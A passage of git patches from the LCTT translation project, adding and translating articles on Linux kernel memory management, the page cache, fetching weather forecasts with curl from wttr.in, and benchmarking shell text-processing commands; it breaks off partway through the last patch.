+标志位 D 和 A 分别表示“脏(dirty)”和“已访问(accessed)”。脏页面表示发生过写入,而已访问的页面表示发生过写入或者读取。这两个标志位都是“粘滞”的:处理器只负责设置它们,清除则由内核来完成。最后,PTE 保存了与该页面对应的起始物理地址,按 4KB 对齐。正是这个看似不起眼的域带来了一些痛苦,因为它把可寻址的物理内存限制在 [4 GB][20] 以内。其余的 PTE 域,以及物理地址扩展(PAE),都留到以后再讲。
+
+由于一个虚拟页面上的所有字节都共享同一组 U/S 和 R/W 标志位,所以内存保护的最小单位是虚拟页面。不过,同一块物理内存可能被不同的页面映射,而这些页面可能带有不同的保护标志。请注意,在 PTE 中根本看不到执行权限。这就是经典的 x86 分页允许执行栈上代码的原因,也让栈缓冲区溢出更容易被利用(即便栈不可执行,依然可以通过 [return-to-libc][21] 等技术加以利用)。PTE 缺少禁止执行标志位也说明了一个更普遍的事实:VMA 中的权限标志未必能完整地转换成硬件保护。内核会尽力而为,但体系结构最终限制了它能做到的事情。
+
+虚拟内存本身并不保存任何东西,它只是把程序的地址空间 _映射_ 到底层的物理内存上,后者被处理器当作一个称为物理地址空间的大块来访问。虽然总线上的内存操作 [多少有些复杂][22],我们在这里可以先忽略这些细节,并假设物理地址从 0 开始、以字节为单位一直递增到可用内存的上限。内核把这个物理地址空间进一步划分为页面帧。处理器并不知道、也不关心页面帧,但它们对内核至关重要,因为页面帧是物理内存管理的基本单位。Linux 和 Windows 在 32 位模式下都使用 4KB 大小的页面帧;下图是一台拥有 2GB 内存的机器的例子:
+
+![Physical Address Space](http://static.duartes.org/img/blogPosts/physicalAddressSpace.png)
+
+在 Linux 中,每个页面帧都由一个 [描述符][23] 和 [若干标志][24] 来跟踪。这些描述符合在一起记录了计算机中的全部物理内存;每个页面帧的确切状态总是已知的。物理内存是用 [伙伴(buddy)内存分配][25](译者注:一种内存分配算法)技术来管理的,因此,如果一个页面帧可以通过伙伴系统分配,它就是空闲的(free)。一个已分配的页面帧可能是匿名的、保存着程序数据,也可能位于页面缓存中、保存着某个文件或块设备中的数据。还有其它一些特殊用途的页面帧,不过这里暂且不去管它们。Windows 则用一个类似的页帧号(Page Frame Number,PFN)数据库来跟踪物理内存。
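+
+在 Linux 上,可以通过 /proc 直接观察伙伴分配器和物理内存的大致状态,下面是一个简单的示例:
+```
+# Free page-frame blocks per order (column N = blocks of 2^N contiguous frames)
+cat /proc/buddyinfo
+
+# Total and free physical memory, for comparison
+grep -E 'MemTotal|MemFree' /proc/meminfo
+```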
+
+我们把虚拟内存区域(VMA)、页面表条目(PTE)、以及页面帧放在一起来理解它们是如何工作的。下面是一个用户堆的示例:
+
+![Physical Address Space](http://static.duartes.org/img/blogPosts/heapMapped.png)
+
+蓝色的矩形表示处于 VMA 范围内的页面,箭头表示把页面映射到页面帧上的页面表条目。有些虚拟页面没有箭头,这表示它们对应的 PTE 的 Present(存在)标志位被清除(置为 0)。原因可能是这些页面从未被访问过,也可能是其内容已经被交换出去(swap out)。无论哪种情况,访问这些页面都会导致页面故障,即使它们位于 VMA 之内。VMA 和页面表出现这种不一致看上去似乎很奇怪,但这种情况其实经常发生。
+
+一个 VMA 就像是你的程序和内核之间的一份合约。你请求做某件事情(分配内存、映射文件等),内核回答“没问题”,然后创建或者更新相应的 VMA。但它 _并不会_ 立刻兑现承诺,而是等到真的发生页面故障时才去做实际的工作。内核就是一个懒惰、耍赖的家伙;这就是虚拟内存的基本原则。它适用于大多数情况,有些情况在意料之中,有些则出人意料,但规则始终是:VMA 记录的是双方 _约定好_ 的内容,而 PTE 反映的是这个懒惰的内核 _实际完成_ 的事情。这两种数据结构共同管理着程序的内存;解决页面故障、释放内存、把内存交换出去等等,都要靠它们配合完成。下面来看一个简单的内存分配的例子:
+
+![Example of demand paging and memory allocation](http://static.duartes.org/img/blogPosts/heapAllocation.png)
+
+当程序通过 [brk()][26] 系统调用请求更多内存时,内核只是简单地 [更新][27] 堆的 VMA,然后就宣告完工。这时并没有真正分配页面帧,新的页面也没有出现在物理内存中。一旦程序试图访问这些页面,处理器就会产生页面故障,进而调用 [do_page_fault()][28]。它使用 [find_vma()][30] 去 [搜索][29] 覆盖发生故障的虚拟地址的 VMA。如果找到了,还会根据这次访问的类型(读或写)检查该 VMA 上的权限。如果没有合适的 VMA,也就是说这次内存访问没有对应的“合约”,进程就会被处以段错误(Segmentation Fault)的“惩罚”。
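+
+缺页的次数同样可以在用户态观察到。下面是一个简单的示例(假设在 Linux 上,并且进程名中没有空格,否则字段编号会偏移),从 /proc 的 stat 文件中取出当前 shell 的次缺页(minor fault)和主缺页(major fault)计数:
+```
+# Fields 10 and 12 of /proc/<pid>/stat are minflt and majflt (see proc(5));
+# the field numbers assume the process name contains no spaces
+awk '{print "minor faults:", $10, "  major faults:", $12}' /proc/$$/stat
+```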
+
+当 [找到][31] 一个合适的 VMA 后,内核必须根据 PTE 的内容和 VMA 的类型来 [处理][32] 这个故障。在我们的例子中,PTE 显示这个页面 [不存在][33]。事实上,我们的 PTE 完全是空白的(全为 0),在 Linux 中这表示这个虚拟页面从来没有被映射过。由于这是一个匿名 VMA,这纯粹是一个只和 RAM 打交道的事务,必须由 [do_anonymous_page()][34] 来处理:它分配一个页面帧,并生成一个 PTE,把发生故障的虚拟页面映射到刚刚分配的页面帧上。
+
+事情也可能有所不同。例如,被交换出去的页面对应的 PTE,其 Present 标志位为 0,但并不是空白的,而是记录着保存该页面内容的交换位置。这些内容必须从磁盘读出,并由 [do_swap_page()][35] 加载到一个页面帧中,这个过程被称为 [主缺页(major fault)][36]。
+
+到这里,我们对内核用户内存管理的探索之旅就完成了前半部分。在下一篇文章中,我们会把文件也纳入进来,构建出一幅完整的内存基础知识图景,并讨论其中对性能的影响。
+
+--------------------------------------------------------------------------------
+
+via: http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory/
+
+作者:[Gustavo Duarte][a]
+译者:[qhwdw](https://github.com/qhwdw)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://duartes.org/gustavo/blog/about/
+[1]:http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory
+[2]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1075
+[3]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1129
+[4]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L173
+[5]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L197
+[6]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L206
+[7]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L99
+[8]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm.h#L76
+[9]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L150
+[10]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L174
+[11]:http://en.wikipedia.org/wiki/Red_black_tree
+[12]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L175
+[13]:http://lxr.linux.no/linux+v2.6.28.1/fs/proc/task_mmu.c#L201
+[14]:http://www.nirsoft.net/kernel_struct/vista/EPROCESS.html
+[15]:http://www.nirsoft.net/kernel_struct/vista/MMVAD.html
+[16]:http://en.wikipedia.org/wiki/AVL_tree
+[17]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L185
+[18]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L173
+[19]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L230
+[20]:http://www.google.com/search?hl=en&amp;amp;amp;q=2^20+*+2^12+bytes+in+GB
+[21]:http://en.wikipedia.org/wiki/Return-to-libc_attack
+[22]:http://duartes.org/gustavo/blog/post/getting-physical-with-memory
+[23]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm_types.h#L32
+[24]:http://lxr.linux.no/linux+v2.6.28/include/linux/page-flags.h#L14
+[25]:http://en.wikipedia.org/wiki/Buddy_memory_allocation
+[26]:http://www.kernel.org/doc/man-pages/online/pages/man2/brk.2.html
+[27]:http://lxr.linux.no/linux+v2.6.28.1/mm/mmap.c#L2050
+[28]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L583
+[29]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L692
+[30]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1466
+[31]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L711
+[32]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2653
+[33]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2674
+[34]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2681
+[35]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2280
+[36]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2316
From ceed2592d3e63a1f04b82f3656a52603e2f63f63 Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Fri, 12 Jan 2018 15:28:20 +0800
Subject: [PATCH 265/371] Translating by qhwdw
---
...che the Affair Between Memory and Files.md | 76 +++++++++++++++++++
1 file changed, 76 insertions(+)
create mode 100644 sources/tech/20090211 Page Cache the Affair Between Memory and Files.md
diff --git a/sources/tech/20090211 Page Cache the Affair Between Memory and Files.md b/sources/tech/20090211 Page Cache the Affair Between Memory and Files.md
new file mode 100644
index 0000000000..98c546eb2a
--- /dev/null
+++ b/sources/tech/20090211 Page Cache the Affair Between Memory and Files.md
@@ -0,0 +1,76 @@
+Translating by qhwdw
+
+[Page Cache, the Affair Between Memory and Files][1]
+============================================================
+
+
+Previously we looked at how the kernel [manages virtual memory][2] for a user process, but files and I/O were left out. This post covers the important and often misunderstood relationship between files and memory and its consequences for performance.
+
+Two serious problems must be solved by the OS when it comes to files. The first one is the mind-blowing slowness of hard drives, and [disk seeks in particular][3], relative to memory. The second is the need to load file contents in physical memory once and share the contents among programs. If you use [Process Explorer][4] to poke at Windows processes, you'll see there are ~15MB worth of common DLLs loaded in every process. My Windows box right now is running 100 processes, so without sharing I'd be using up to ~1.5 GB of physical RAM just for common DLLs. No good. Likewise, nearly all Linux programs need [ld.so][5] and libc, plus other common libraries.
+
+Happily, both problems can be dealt with in one shot: the page cache, where the kernel stores page-sized chunks of files. To illustrate the page cache, I'll conjure a Linux program named render, which opens file scene.dat and reads it 512 bytes at a time, storing the file contents into a heap-allocated block. The first read goes like this:
+
+![Reading and the page cache](http://static.duartes.org/img/blogPosts/readFromPageCache.png)
+
+After 12KB have been read, render's heap and the relevant page frames look thus:
+
+![Non-mapped file read](http://static.duartes.org/img/blogPosts/nonMappedFileRead.png)
+
+This looks innocent enough, but there's a lot going on. First, even though this program uses regular read calls, three 4KB page frames are now in the page cache storing part of scene.dat. People are sometimes surprised by this, but all regular file I/O happens through the page cache. In x86 Linux, the kernel thinks of a file as a sequence of 4KB chunks. If you read a single byte from a file, the whole 4KB chunk containing the byte you asked for is read from disk and placed into the page cache. This makes sense because sustained disk throughput is pretty good and programs normally read more than just a few bytes from a file region. The page cache knows the position of each 4KB chunk within the file, depicted above as #0, #1, etc. Windows uses 256KB views analogous to pages in the Linux page cache.
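+
+You can watch this from a shell. Here is a rough sketch (Linux-specific, and dropping caches needs root) that reads a file with plain `cat` and observes the page cache grow by roughly the file's size:
+```
+# Create a 100MB test file, flush it from the cache, then read it back
+dd if=/dev/zero of=testfile bs=1M count=100 status=none
+sync && echo 3 | sudo tee /proc/sys/vm/drop_caches > /dev/null
+
+grep '^Cached:' /proc/meminfo    # baseline page cache size
+cat testfile > /dev/null         # regular read()s go through the page cache
+grep '^Cached:' /proc/meminfo    # should be roughly 100 MB (102400 kB) larger
+```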
+
+Sadly, in a regular file read the kernel must copy the contents of the page cache into a user buffer, which not only takes cpu time and hurts the [cpu caches][6], but also wastes physical memory with duplicate data. As per the diagram above, the scene.dat contents are stored twice, and each instance of the program would store the contents an additional time. We've mitigated the disk latency problem but failed miserably at everything else. Memory-mapped files are the way out of this madness:
+
+![Mapped file read](http://static.duartes.org/img/blogPosts/mappedFileRead.png)
+
+When you use file mapping, the kernel maps your program's virtual pages directly onto the page cache. This can deliver a significant performance boost: [Windows System Programming][7] reports run time improvements of 30% and up relative to regular file reads, while similar figures are reported for Linux and Solaris in [Advanced Programming in the Unix Environment][8]. You might also save large amounts of physical memory, depending on the nature of your application.
+
+As always with performance, [measurement is everything][9], but memory mapping earns its keep in a programmer's toolbox. The API is pretty nice too, it allows you to access a file as bytes in memory and does not require your soul and code readability in exchange for its benefits. Mind your [address space][10] and experiment with [mmap][11] in Unix-like systems, [CreateFileMapping][12] in Windows, or the many wrappers available in high level languages. When you map a file its contents are not brought into memory all at once, but rather on demand via [page faults][13]. The fault handler [maps your virtual pages][14] onto the page cache after [obtaining][15] a page frame with the needed file contents. This involves disk I/O if the contents weren't cached to begin with.
+
+Now for a pop quiz. Imagine that the last instance of our render program exits. Would the pages storing scene.dat in the page cache be freed immediately? People often think so, but that would be a bad idea. When you think about it, it is very common for us to create a file in one program, exit, then use the file in a second program. The page cache must handle that case. When you think more about it, why should the kernel ever get rid of page cache contents? Remember that disk is 5 orders of magnitude slower than RAM, hence a page cache hit is a huge win. So long as there's enough free physical memory, the cache should be kept full. It is therefore not dependent on a particular process, but rather it's a system-wide resource. If you run render a week from now and scene.dat is still cached, bonus! This is why the kernel cache size climbs steadily until it hits a ceiling. It's not because the OS is garbage and hogs your RAM, it's actually good behavior because in a way free physical memory is a waste. Better use as much of the stuff for caching as possible.
+
+Due to the page cache architecture, when a program calls [write()][16] bytes are simply copied to the page cache and the page is marked dirty. Disk I/O normally does not happen immediately, thus your program doesn't block waiting for the disk. On the downside, if the computer crashes your writes will never make it, hence critical files like database transaction logs must be [fsync()][17]ed (though one must still worry about drive controller caches, oy!). Reads, on the other hand, normally block your program until the data is available. Kernels employ eager loading to mitigate this problem, an example of which is read ahead where the kernel preloads a few pages into the page cache in anticipation of your reads. You can help the kernel tune its eager loading behavior by providing hints on whether you plan to read a file sequentially or randomly (see [madvise()][18], [readahead()][19], [Windows cache hints][20] ). Linux [does read-ahead][21] for memory-mapped files, but I'm not sure about Windows. Finally, it's possible to bypass the page cache using [O_DIRECT][22] in Linux or [NO_BUFFERING][23] in Windows, something database software often does.
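+
+The dirty-page bookkeeping is easy to observe too. A quick sketch (Linux-specific; the numbers depend on your writeback settings and may fall on their own as the kernel flushes in the background):
+```
+grep '^Dirty:' /proc/meminfo                               # dirty pages before
+dd if=/dev/zero of=dirty.tmp bs=1M count=50 status=none    # buffered writes
+grep '^Dirty:' /proc/meminfo                               # usually jumps by ~50 MB
+sync                                                       # force writeback to disk
+grep '^Dirty:' /proc/meminfo                               # back down again
+rm dirty.tmp
+```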
+
+A file mapping may be private or shared. This refers only to updates made to the contents in memory: in a private mapping the updates are not committed to disk or made visible to other processes, whereas in a shared mapping they are. Kernels use the copy on write mechanism, enabled by page table entries, to implement private mappings. In the example below, both render and another program called render3d (am I creative or what?) have mapped scene.dat privately. Render then writes to its virtual memory area that maps the file:
+
+![The Copy-On-Write mechanism](http://static.duartes.org/img/blogPosts/copyOnWrite.png)
+
+The read-only page table entries shown above do not mean the mapping is read only, they're merely a kernel trick to share physical memory until the last possible moment. You can see how 'private' is a bit of a misnomer until you remember it only applies to updates. A consequence of this design is that a virtual page that maps a file privately sees changes done to the file by other programs as long as the page has only been read from. Once copy-on-write is done, changes by others are no longer seen. This behavior is not guaranteed by the kernel, but it's what you get in x86 and makes sense from an API perspective. By contrast, a shared mapping is simply mapped onto the page cache and that's it. Updates are visible to other processes and end up in the disk. Finally, if the mapping above were read-only, page faults would trigger a segmentation fault instead of copy on write.
+
+Dynamically loaded libraries are brought into your program's address space via file mapping. There's nothing magical about it, it's the same private file mapping available to you via regular APIs. Below is an example showing part of the address spaces from two running instances of the file-mapping render program, along with physical memory, to tie together many of the concepts we've seen.
+
+![Mapping virtual memory to physical memory](http://static.duartes.org/img/blogPosts/virtualToPhysicalMapping.png)
+
+This concludes our 3-part series on memory fundamentals. I hope the series was useful and provided you with a good mental model of these OS topics.
+
+--------------------------------------------------------------------------------
+
+via: https://manybutfinite.com/post/page-cache-the-affair-between-memory-and-files/
+
+作者:[Gustavo Duarte][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://duartes.org/gustavo/blog/about/
+[1]:https://manybutfinite.com/post/page-cache-the-affair-between-memory-and-files/
+[2]:https://manybutfinite.com/post/how-the-kernel-manages-your-memory
+[3]:https://manybutfinite.com/post/what-your-computer-does-while-you-wait
+[4]:http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
+[5]:http://ld.so
+[6]:https://manybutfinite.com/post/intel-cpu-caches
+[7]:http://www.amazon.com/Windows-Programming-Addison-Wesley-Microsoft-Technology/dp/0321256190/
+[8]:http://www.amazon.com/Programming-Environment-Addison-Wesley-Professional-Computing/dp/0321525949/
+[9]:https://manybutfinite.com/post/performance-is-a-science
+[10]:https://manybutfinite.com/post/anatomy-of-a-program-in-memory
+[11]:http://www.kernel.org/doc/man-pages/online/pages/man2/mmap.2.html
+[12]:http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
+[13]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2678
+[14]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2436
+[15]:http://lxr.linux.no/linux+v2.6.28/mm/filemap.c#L1424
+[16]:http://www.kernel.org/doc/man-pages/online/pages/man2/write.2.html
+[17]:http://www.kernel.org/doc/man-pages/online/pages/man2/fsync.2.html
+[18]:http://www.kernel.org/doc/man-pages/online/pages/man2/madvise.2.html
+[19]:http://www.kernel.org/doc/man-pages/online/pages/man2/readahead.2.html
+[20]:http://msdn.microsoft.com/en-us/library/aa363858(VS.85).aspx#caching_behavior
+[21]:http://lxr.linux.no/linux+v2.6.28/mm/filemap.c#L1424
+[22]:http://www.kernel.org/doc/man-pages/online/pages/man2/open.2.html
+[23]:http://msdn.microsoft.com/en-us/library/cc644950(VS.85).aspx
\ No newline at end of file
From b3f0125ff06503e773951934b043c6e010e4276c Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:21:04 +0800
Subject: [PATCH 266/371] translate done: 20171013 Get Your Weather Forecast
From the Linux CLI.md
---
...our Weather Forecast From the Linux CLI.md | 140 ------------------
...our Weather Forecast From the Linux CLI.md | 113 ++++++++++++++
2 files changed, 113 insertions(+), 140 deletions(-)
delete mode 100644 sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
create mode 100644 translated/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
diff --git a/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md b/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
deleted file mode 100644
index 07547654cf..0000000000
--- a/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
+++ /dev/null
@@ -1,140 +0,0 @@
-translating by lujun9972
-Get Your Weather Forecast From the Linux CLI
-======
-
-### Objective
-
-Display the current weather forecast in the Linux command line.
-
-### Distributions
-
-This will work on any Linux distribution.
-
-### Requirements
-
-A working Linux install with an Internet connection.
-
-### Difficulty
-
-Easy
-
-### Conventions
-
- * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command
- * **$** \- given command to be executed as a regular non-privileged user
-
-
-
-### Introduction
-
-It's be convenient to be able to retrieve the latest weather forecast right from your terminal without opening up a web browser, wouldn't it? What about scripting it or setting a cron job? Well, you can.
-
-`http://wttr.in` is a website that allows you to search for weather forecasts anywhere in the world, and it displays he results in ASCII characters. By using `cURL`, you can access `http://wttr.in`, you can get your results directly in the terminal.
-
-### Get Your Local Weather
-
-
-
-![Local weather from wttr.in][1]
-It's really simple to grab your local weather. `wttr.in` will automatically try to detect your location based on your IP address. It's reasonably accurate, unless you're using a VPN, of course.
-```
-
-$ curl wttr.in
-
-```
-
-### Get Weather By City
-
-
-
-![Weather by city from wttr.in][2]
-Now, if you would like the weather in a different city, you can specify that with a slash at the end of `wttr.in`. Replace any spaces in the name with a `+`.
-```
-
-$ curl wttr.in/New+York
-
-```
-
-You can also specify cities the way they're written in Unix timezones.
-```
-
-$ curl wttr.in/New_York
-
-```
-
-Don't use spaces unless you like strange and inaccurate results.
-
-### Get Weather By Airport
-
-
-
-![Weather by airport from wttr.in][3]
-If you're familiar with the three letter airport codes in your area, you can use those too. They might be closer to you and more accurate than the city in general.
-```
-
-$ curl wttr.in/JFK
-
-```
-
-### Best Guess
-
-
-
-![Weather by landmark from wttr.in][4]
-You can have `wttr.in` take a guess on the weather base on a landmark using the `~` character.
-```
-
-$ curl wttr.in/~Statue+Of+Liberty
-
-```
-
-### Weather From A Domain Name
-
-
-
-![Weather by domain name from wttr.in][5]
-Did you ever wonder what the weather is like where LinuxConfig is hosted? Now, now you can find out! `wttr.in` can check weather by domain name. Sure, it's probably not the most useful feature, but it's still interesting none the less.
-```
-
-$ curl wttr.in/@linuxconfig.org
-
-```
-
-### Changing The Temperature Units
-
-
-
-![Change unit system in wttr.in][6]
-By default, `wttr.in` will display temperatures in the units(C or F) used in your actual location. Basically, in States, you'll get Fahrenheit, and everyone else will see Celsius. You can change that by adding `?u` to see Fahrenheit or `?m` to see Celsius.
-```
-
-$ curl wttr.in/New_York?m
-
-$ curl wttr.in/Toronto?u
-
-```
-
-There's an odd bug with ZSH that prevents this from working, so you need to use Bash if you want to convert the units.
-
-### Closing Thoughts
-
-You can easily incorporate a call to `wttr.in` into a script, cron job, or even your MOTD. Of course, you don't need to get that involved. You can just lazily type a call in to this awesome service whenever you want to check the forecast.
-
-
---------------------------------------------------------------------------------
-
-via: https://linuxconfig.org/get-your-weather-forecast-from-the-linux-cli
-
-作者:[Nick Congleton][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://linuxconfig.org
-[1]:https://linuxconfig.org/images/wttr-local.jpg
-[2]:https://linuxconfig.org/images/wttr-city.jpg
-[3]:https://linuxconfig.org/images/wttr-airport.jpg
-[4]:https://linuxconfig.org/images/wttr-landmark.jpg
-[5]:https://linuxconfig.org/images/wttr-url.jpg
-[6]:https://linuxconfig.org/images/wttr-units.jpg
diff --git a/translated/tech/20171013 Get Your Weather Forecast From the Linux CLI.md b/translated/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
new file mode 100644
index 0000000000..952d87b25a
--- /dev/null
+++ b/translated/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
@@ -0,0 +1,113 @@
+在 Linux 字符界面中获取天气预报
+======
+
+**目标:**使用 Linux 命令行显示天气预报。
+
+**发行版:**所有 Linux 发行版。
+
+**要求:**能连上因特网的 Linux
+
+**难度:**容易
+
+**约定:**
+
+* `#` - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行也可以使用 `sudo` 命令
+* `$` - 可以使用普通用户来执行指定命令
+
+### 简介
+
+无需打开网页浏览器就能直接在终端里获取最新的天气预报,那该多方便啊,对吧?你还可以把它写成脚本,或者设置成 cron 定时任务。
+
+`http://wttr.in` 是一个可以查询世界各地天气预报的网站,它以 ASCII 字符的形式来显示结果。用 `cURL` 访问 `http://wttr.in`,就能直接在终端里看到查询结果了。
+
+### 获取所在地的天气
+
+![Local weather from wttr.in][1]
+
+要抓取所在地的天气情况非常简单。`wttr.in` 会自动根据 IP 地址来探测你的所在地。除非你用了 VPN,否则它的精度还不错。
+```
+$ curl wttr.in
+```
+
+### 获取指定城市的天气
+
+![Weather by city from wttr.in][2]
+
+你可以通过在 `wttr.in` 后加上斜杠和城市名称的方式来获得其他城市的天气情况。不过要把名字中的空格替换成`+`。
+```
+$ curl wttr.in/New+York
+```
+
+你也可以以 Unix 时区的形式来填写城市名称。
+```
+$ curl wttr.in/New_York
+```
+
+不要直接使用空格,否则会出现奇怪而不准确的结果。
+
+### 获取机场天气
+
+
+
+![Weather by airport from wttr.in][3]
+
+若你对地区的三位机场代号很熟悉,你也可以使用机场代号来查询天气。一般来说使用机场要比使用城市更贴近你,而且更精确一些。
+```
+$ curl wttr.in/JFK
+```
+
+### 猜测所在地
+
+![Weather by landmark from wttr.in][4]
+
+通过使用 `~` 字符,你可以让 `wttr.in` 通过地标来猜测天气情况。
+```
+$ curl wttr.in/~Statue+Of+Liberty
+```
+
+### 域名所在地的天气
+
+![Weather by domain name from wttr.in][5]
+
+你想不想知道 LinuxConfig 托管地的天气?现在有一个方法可以知道!`wttr.in` 可以通过域名获取天气。是的,这个功能可能不那么实用,但这很有趣啊。
+```
+$ curl wttr.in/@linuxconfig.org
+```
+
+### 更改温度单位
+
+![Change unit system in wttr.in][6]
+
+默认情况下,`wttr.in` 会根据你的实际地址来决定显示哪种温度单位 (C 还是 F)。基本上,在美国,使用的是华氏度,而其他地方显示的是摄氏度。你可以指定显示的温度单位,在 URL 后添加 `?u` 会显示华氏度,而添加 `?m` 会显示摄氏度。
+```
+$ curl wttr.in/New_York?m
+
+$ curl wttr.in/Toronto?u
+```
+
+在 ZSH 中有一个很奇怪的 bug,会导致这两条命令无法正常工作;如果你需要切换单位,恐怕得改用 Bash。
+
+### 总结
+
+你可以很方便地在脚本、cron 定时任务,甚至 MOTD(LCTT 注:Message Of The Day,每日消息)中调用 `wttr.in`。当然,你也完全不必搞得这么复杂,想看天气预报的时候,随手敲一条命令访问这个超棒的服务就行了。
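+
+比如,下面是一个极简的示例脚本(其中的城市名和缓存路径只是假设),它把 `wttr.in` 的输出缓存到本地文件,可以放进 cron 定时刷新,也可以在 MOTD 中直接读取这个缓存:
+```
+#!/bin/bash
+# Fetch the forecast and cache it locally; safe to run from cron
+CITY="New_York"                   # change to your own city
+CACHE="$HOME/.cache/weather.txt"
+
+mkdir -p "$(dirname "$CACHE")"
+if curl -s "wttr.in/${CITY}?m" -o "${CACHE}.new"; then
+    mv "${CACHE}.new" "$CACHE"    # only replace the cache on success
+fi
+cat "$CACHE"
+```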
+
+
+--------------------------------------------------------------------------------
+
+via: https://linuxconfig.org/get-your-weather-forecast-from-the-linux-cli
+
+作者:[Nick Congleton][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linuxconfig.org
+[1]:https://linuxconfig.org/images/wttr-local.jpg
+[2]:https://linuxconfig.org/images/wttr-city.jpg
+[3]:https://linuxconfig.org/images/wttr-airport.jpg
+[4]:https://linuxconfig.org/images/wttr-landmark.jpg
+[5]:https://linuxconfig.org/images/wttr-url.jpg
+[6]:https://linuxconfig.org/images/wttr-units.jpg
From b23ac72932145a076c71cb1341fb8c857a085df2 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:26:32 +0800
Subject: [PATCH 267/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20BASH=20drivers,?=
=?UTF-8?q?=20start=20your=20engines?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...180111 BASH drivers, start your engines.md | 90 +++++++++++++++++++
1 file changed, 90 insertions(+)
create mode 100644 sources/tech/20180111 BASH drivers, start your engines.md
diff --git a/sources/tech/20180111 BASH drivers, start your engines.md b/sources/tech/20180111 BASH drivers, start your engines.md
new file mode 100644
index 0000000000..7126bea3e0
--- /dev/null
+++ b/sources/tech/20180111 BASH drivers, start your engines.md
@@ -0,0 +1,90 @@
+BASH drivers, start your engines
+======
+
+![](http://www.thelinuxrain.com/content/01-articles/201-bash-drivers-start-your-engines/headimage.jpg)
+
+There's always more than one way to do a job in the shell, and there may not be One Best Way to do that job, either.
+
+Nevertheless, different commands with the same output can differ in how long they take, how much memory they use and how hard they make the CPU work.
+
+Out of curiosity I trialled 6 different ways to get the last 5 characters from each line of a text file, which is a simple text-processing task. The 6 commands are explained below and are abbreviated here as awk5, echo5, grep5, rev5, sed5 and tail5. These were also the names of the files generated by the commands.
+
+### Tracking performance
+
+I ran the trial on a 1.6GB UTF-8 text file with 1559391514 characters on 3570866 lines, or an average of 437 characters per line, and no blank lines. The last 5 characters on every line were alphanumeric.
+
+To time the 6 commands I used **time** (the BASH shell built-in, not GNU **time** ) and while the commands were running I checked **top** to follow memory and CPU usage. My system is the Dell OptiPlex 9020 Micro described [here][1] and runs Debian 9.
+
+All 6 commands used between 1 and 1.4GB of memory (VIRT in **top** ), and awk5, echo5, grep5 and sed5 ran at close to 100% CPU usage. Interestingly, rev5 ran at ca 30% CPU and tail5 at ca 15%.
+
+To ensure that all 6 commands had done the same job, I did a **diff** on the 6 output files, each about 21 MB:
+
+![][2]
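+
+The check itself is easy to reproduce; something like the following loop (filenames as used above) compares each output file against awk5:
+```
+# Compare every output file against awk5; silence means they are identical
+for f in echo5 grep5 rev5 sed5 tail5; do
+    diff -q awk5 "$f"
+done
+```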
+
+### And the winner is...
+
+Here are the elapsed times:
+
+![][3]
+
+Well, AWK (GNU AWK 4.1.4) is really fast. Sure, all 6 commands could process a 100-line file zippety-quick, but for big text-processing jobs, fire up your AWK.
+
+### Commands used
+```
+awk '{print substr($0,length($0)-4,5)}' file > awk5
+```
+
